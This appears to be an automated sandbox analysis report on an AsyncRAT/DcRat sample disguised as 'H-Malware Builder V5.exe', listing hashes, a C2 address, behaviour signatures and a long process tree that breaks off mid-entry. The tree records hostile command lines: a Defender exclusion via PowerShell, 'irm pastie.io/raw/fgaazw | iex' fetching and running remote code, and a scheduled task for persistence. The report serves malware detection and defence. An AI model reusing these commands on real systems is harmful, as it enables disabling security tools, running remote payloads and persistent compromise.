Resubmissions

04/12/2024, 07:47

241204-jmh8dsyjgs 10

03/12/2024, 09:46

241203-lrs99szmav 10

Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    03/12/2024, 09:46

General

  • Target

    H-Malware Builder V5.exe

  • Size

    407KB

  • MD5

    c8f6d76b4ae82978272bde392561c4f4

  • SHA1

    80447d36fcf88cc9caa806db53e22d9468cc31ee

  • SHA256

    c981ebcf0c0cf857162ae35b9385c22d3198c2ec9ea00e37fcfe74a79eb3510e

  • SHA512

    10fa87f050a9ceb658e443317158ef8b1dbaa9e183ec61b5e5e42adb562f7918d996134aba7f0bbad852def4d6b0824c7b9716628b554194d0fd95974de6b2ad

  • SSDEEP

    12288:r5p4UNBN3aqeKNoRfwoZrHMBV9EwEcb8+DvtuWUb:r9N3aqPCRooZwBjEhcYcvYWUb

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

bay-helps.gl.at.ply.gg:36538

Mutex

DcRatMutex_qwqdanchun

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Async RAT payload 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 46 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 47 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 45 IoCs
  • Executes dropped EXE 1 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 13 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 63 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 25 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:620
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:1048
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{2040b6c4-4567-4cfa-ba81-a319d15eb9c3}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4688
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:676
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:956
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:324
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:408
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:476
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                  1⤵
                    PID:628
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                    1⤵
                      PID:1116
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1152
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1168
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                          1⤵
                            PID:1180
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                            1⤵
                              PID:1208
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                              1⤵
                                PID:1312
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                1⤵
                                  PID:1408
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                  1⤵
                                  • Drops file in System32 directory
                                  PID:1460
                                  • C:\Windows\system32\taskhostw.exe
                                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                                    2⤵
                                      PID:3068
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                    1⤵
                                      PID:1508
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                      1⤵
                                        PID:1528
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                        1⤵
                                          PID:1536
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                          1⤵
                                            PID:1556
                                            • C:\Windows\system32\sihost.exe
                                              sihost.exe
                                              2⤵
                                                PID:2736
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1720
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                1⤵
                                                  PID:1776
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                  1⤵
                                                    PID:1896
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1908
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:1916
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        1⤵
                                                          PID:2032
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                          1⤵
                                                            PID:1524
                                                          • C:\Windows\System32\spoolsv.exe
                                                            C:\Windows\System32\spoolsv.exe
                                                            1⤵
                                                              PID:2140
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                              1⤵
                                                                PID:2260
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                1⤵
                                                                  PID:2344
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                  1⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2472
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2592
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2600
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                      1⤵
                                                                        PID:2752
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                        1⤵
                                                                        • Drops file in System32 directory
                                                                        • Modifies data under HKEY_USERS
                                                                        PID:2808
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2860
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                          1⤵
                                                                          • Enumerates connected drives
                                                                          PID:2872
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                          1⤵
                                                                            PID:2880
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2896
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:3152
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                1⤵
                                                                                  PID:3160
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                  1⤵
                                                                                    PID:3592
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:3684
                                                                                    • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                      2⤵
                                                                                      • Checks computer location settings
                                                                                      • Drops startup file
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:884
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                        3⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:700
                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
                                                                                        3⤵
                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                        • Checks computer location settings
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:3360
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
                                                                                          4⤵
                                                                                            PID:4408
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              5⤵
                                                                                                PID:2908
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell "irm pastie.io/raw/fgaazw | iex"
                                                                                                5⤵
                                                                                                  PID:4928
                                                                                              • C:\Windows\SYSTEM32\SCHTASKS.exe
                                                                                                "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
                                                                                                4⤵
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:216
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  5⤵
                                                                                                    PID:232
                                                                                                • C:\Windows\SYSTEM32\SCHTASKS.exe
                                                                                                  "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
                                                                                                  4⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:4712
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    5⤵
                                                                                                      PID:1240
                                                                                                • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                  3⤵
                                                                                                  • Checks computer location settings
                                                                                                  • Drops startup file
                                                                                                  PID:3372
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                    4⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    PID:2468
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      5⤵
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:2444
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                    4⤵
                                                                                                    • Checks computer location settings
                                                                                                    • Drops startup file
                                                                                                    PID:876
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                      5⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      PID:4360
                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        6⤵
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:3196
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                      5⤵
                                                                                                      • Checks computer location settings
                                                                                                      • Drops startup file
                                                                                                      PID:4448
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                        6⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        PID:3828
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          7⤵
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          PID:3136
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                        6⤵
                                                                                                        • Checks computer location settings
                                                                                                        • Drops startup file
                                                                                                        PID:4912
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                          7⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          PID:376
                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            8⤵
                                                                                                              PID:652
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                            7⤵
                                                                                                            • Checks computer location settings
                                                                                                            • Drops startup file
                                                                                                            PID:2000
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                              8⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              PID:4024
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                9⤵
                                                                                                                  PID:4792
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                8⤵
                                                                                                                • Checks computer location settings
                                                                                                                • Drops startup file
                                                                                                                PID:1224
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                  9⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  PID:64
                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    10⤵
                                                                                                                      PID:1372
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                    9⤵
                                                                                                                    • Checks computer location settings
                                                                                                                    • Drops startup file
                                                                                                                    PID:3664
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                      10⤵
                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                      PID:3064
                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        11⤵
                                                                                                                          PID:3452
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                        10⤵
                                                                                                                        • Checks computer location settings
                                                                                                                        • Drops startup file
                                                                                                                        PID:3032
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                          11⤵
                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                          PID:2948
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            12⤵
                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                            PID:1080
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                          11⤵
                                                                                                                          • Checks computer location settings
                                                                                                                          • Drops startup file
                                                                                                                          PID:4044
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                            12⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            PID:2708
                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              13⤵
                                                                                                                                PID:4820
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                              12⤵
                                                                                                                              • Checks computer location settings
                                                                                                                              • Drops startup file
                                                                                                                              PID:4740
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                13⤵
                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                PID:376
                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  14⤵
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:2108
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                13⤵
                                                                                                                                • Checks computer location settings
                                                                                                                                • Drops startup file
                                                                                                                                PID:1576
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                  14⤵
                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                  PID:3832
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    15⤵
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:3088
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                  14⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Drops startup file
                                                                                                                                  PID:5072
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                    15⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    PID:4844
                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      16⤵
                                                                                                                                        PID:2056
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                      15⤵
                                                                                                                                      • Checks computer location settings
                                                                                                                                      • Drops startup file
                                                                                                                                      PID:4820
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                        16⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        PID:4436
                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          17⤵
                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                          PID:3720
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                        16⤵
                                                                                                                                        • Checks computer location settings
                                                                                                                                        • Drops startup file
                                                                                                                                        PID:3872
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                          17⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          PID:4672
                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            18⤵
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:3476
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                          17⤵
                                                                                                                                          • Checks computer location settings
                                                                                                                                          • Drops startup file
                                                                                                                                          PID:1928
                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                            18⤵
                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                            PID:1040
                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              19⤵
                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                              PID:936
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                            18⤵
                                                                                                                                            • Checks computer location settings
                                                                                                                                            • Drops startup file
                                                                                                                                            PID:2056
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                              19⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              PID:2456
                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                20⤵
                                                                                                                                                  PID:2496
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                19⤵
                                                                                                                                                • Checks computer location settings
                                                                                                                                                • Drops startup file
                                                                                                                                                PID:4556
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                  20⤵
                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                  PID:544
                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    21⤵
